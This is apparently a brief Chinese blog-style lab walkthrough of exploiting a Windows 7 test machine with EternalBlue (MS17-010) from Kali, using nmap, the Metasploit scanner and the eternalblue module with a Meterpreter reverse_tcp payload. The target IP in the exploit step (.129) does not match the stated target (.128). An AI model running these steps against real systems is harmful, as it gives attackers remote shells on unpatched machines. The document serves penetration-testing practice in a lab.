kali Eternalblue to win7
实验准备
攻击机: kali , IP: 192.168.226.130
靶机:win7 , IP: 192.168.226.128
实验过程
关闭win7防火墙,开放445,139端口
扫描以下,查看端口情况
$ sudo nmap -sV -A -O 192.168.226.128
启动msfconsole
$ msfconsole

使用auxiliary/scanner/smb/smb_ms17_010监测ms17_010是否可用
$ use auxiliary/scanner/smb/smb_ms17_010

主机很有可能具有ms17-010的漏洞,可攻击
开始攻击
$ use exploit/windows/smb/ms17_010_eternalblue
$ set RHOST 192.168.226.129 //靶机
$ set LHOST 192.168.226.130 // 攻击机
$ set payload windows/x64/meterpreter/reverse_tcp
$run
成功

欢迎交流指正!
本文介绍如何使用Kali Linux通过EternalBlue漏洞对Windows 7系统进行渗透测试。实验中关闭了目标系统的防火墙并开放445和139端口,使用Metasploit框架的ms17_010_eternalblue模块发起攻击,最终成功获取Meterpreter会话。
3433





